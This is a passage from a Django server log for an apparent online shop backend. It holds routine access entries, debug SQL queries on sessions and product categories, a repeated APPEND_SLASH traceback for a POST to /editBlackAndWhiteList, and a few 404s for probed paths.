HTTP/1.0" 302 0 [19/Dec/2019 17:39:39] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:39:59] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:45:02] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 17:50:05] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:55:08] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:56:53] "GET / HTTP/1.0" 302 0 [19/Dec/2019 17:59:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 17:59:30,648 utils 4252 140031747061504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'wejd8ie7qscdgkdn8xs7oo85ddv8p7xb' LIMIT 1; args=('wejd8ie7qscdgkdn8xs7oo85ddv8p7xb',) DEBUG 2019-12-19 17:59:30,650 utils 4252 140031747061504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('wejd8ie7qscdgkdn8xs7oo85ddv8p7xb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-02T17:59:30.648697+00:00'::timestamptz); args=('wejd8ie7qscdgkdn8xs7oo85ddv8p7xb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 2, 17, 59, 30, 648697, tzinfo=)) [19/Dec/2019 17:59:30] "GET /login/?next=/ HTTP/1.0" 200 1786 [19/Dec/2019 17:59:30] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-19 17:59:31,035 utils 4252 140031747061504 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ig1q2h5iho8fbw9w26bi027jee4zpyra' LIMIT 1; args=('ig1q2h5iho8fbw9w26bi027jee4zpyra',) DEBUG 2019-12-19 17:59:31,038 utils 4252 140031747061504 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ig1q2h5iho8fbw9w26bi027jee4zpyra', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-02T17:59:31.036393+00:00'::timestamptz); args=('ig1q2h5iho8fbw9w26bi027jee4zpyra', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 2, 17, 59, 31, 36393, tzinfo=)) [19/Dec/2019 17:59:31] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [19/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:10:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [19/Dec/2019 18:23:55] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [19/Dec/2019 18:23:57] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=183 HTTP/1.0" 404 6532 Not Found: /newslist.asp [19/Dec/2019 18:23:59] "GET /newslist.asp?type=4&id=1332 HTTP/1.0" 404 6476 [19/Dec/2019 18:25:14] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:30:16] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:37:50] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:38:45] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:45:50] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:46:35] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 18:51:31] "GET / HTTP/1.0" 302 0 [19/Dec/2019 18:57:17] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:06:21] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 19:27:58] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:35:42] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:40:44] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:45:47] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:49:45] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:50:49] "GET / HTTP/1.0" 302 0 [19/Dec/2019 19:55:52] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:04:32] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:10:04] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:15:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:22:47] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:27:49] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:32:52] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:37:55] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:45:28] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:50:30] "GET / HTTP/1.0" 302 0 [19/Dec/2019 20:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 20:58:20] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:10:05] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:15:08] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:20:10] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:25:13] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:30:16] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:36:04] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:41:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:46:09] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:51:12] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [19/Dec/2019 21:54:24] "POST /editBlackAndWhiteList HTTP/1.0" 500 63915 [19/Dec/2019 21:56:14] "GET / HTTP/1.0" 302 0 [19/Dec/2019 21:56:31] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:02:31] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:03:54] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:10:04] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:15:46] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:21:36] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:27:09] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:32:12] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:37:14] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:42:17] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:49:11] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:49:16] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:54:14] "GET / HTTP/1.0" 302 0 [19/Dec/2019 22:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [19/Dec/2019 22:59:16] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:10:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:12:20] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:23:17] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:28:20] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:36:35] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:41:38] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:46:40] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:53:40] "GET / HTTP/1.0" 302 0 [19/Dec/2019 23:58:42] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:10:06] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:13:36] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:15:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:20:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:29:38] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:34:40] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 00:41:40] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:46:57] "GET / HTTP/1.0" 302 0 [20/Dec/2019 00:55:42] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:16:13] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [20/Dec/2019 01:20:20] "GET /proxy.php HTTP/1.0" 404 6456 [20/Dec/2019 01:21:16] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [20/Dec/2019 01:24:14] "POST /editBlackAndWhiteList HTTP/1.0" 500 63915 [20/Dec/2019 01:26:18] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:31:21] "GET / HTTP/1.0" 302 0 Not Found: /echo.php [20/Dec/2019 01:36:56] "GET /echo.php HTTP/1.0" 404 6445 [20/Dec/2019 01:39:12] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:41:47] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:44:15] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:49:18] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:54:21] "GET / HTTP/1.0" 302 0 [20/Dec/2019 01:59:24] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 02:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:15:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:20:59] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:26:02] "GET / HTTP/1.0" 302 0 [20/Dec/2019 02:35:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 02:36:57,298 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:36:57,309 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:36:57,316 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:36:57,320 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:36:57,326 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:36:57,330 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:36:57,335 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:36:57,339 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:36:57,343 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:36:57,349 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:36:57,353 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:36:57,357 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:36:57,361 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:36:57,365 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:36:57,371 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:36:57,375 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:36:57,379 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:36:57,384 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:36:57,388 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:36:57,394 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:36:57,398 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:36:57,402 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:36:57,406 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:36:57,410 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:36:57,416 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:36:57,422 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:36:57,426 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:36:57,430 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:36:57,434 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:36:57,438 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:36:57,445 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:36:57,449 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:36:57,453 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:36:57,457 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:36:57,461 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:36:57,467 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:36:57,471 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:36:57,475 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:36:57,479 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:36:57,483 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 